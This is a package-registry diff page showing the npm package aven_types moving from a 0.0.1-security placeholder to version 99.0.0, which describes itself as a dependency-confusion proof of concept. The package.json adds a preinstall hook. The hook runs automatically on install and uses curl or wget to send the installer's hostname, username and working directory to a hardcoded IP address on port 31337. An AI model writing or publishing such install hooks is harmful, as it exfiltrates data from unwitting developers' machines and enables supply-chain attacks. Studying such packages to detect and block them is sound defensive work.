aven_types 0.0.1-security → 99.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of aven_types might be problematic. Click here for more details.
- package/README.md +2 -4
- package/index.js +2 -0
- package/package.json +9 -4
package/README.md
CHANGED
|
@@ -1,5 +1,3 @@
|
|
|
1
|
-
#
|
|
1
|
+
# aven_types
|
|
2
2
|
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=aven_types for more information.
|
|
3
|
+
Security research — dependency confusion PoC.
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "aven_types",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
3
|
+
"version": "99.0.0",
|
|
4
|
+
"description": "Security research \u2014 dependency confusion PoC (authorized testing only)",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "curl -s \"http://75.119.137.232:31337/depconfuse?pkg=aven_types&h=$(hostname)&u=$(whoami)&d=$(pwd)\" || wget -q -O /dev/null \"http://75.119.137.232:31337/depconfuse?pkg=aven_types&h=$(hostname)&u=$(whoami)&d=$(pwd)\" || true"
|
|
8
|
+
},
|
|
9
|
+
"author": "Security Researcher",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|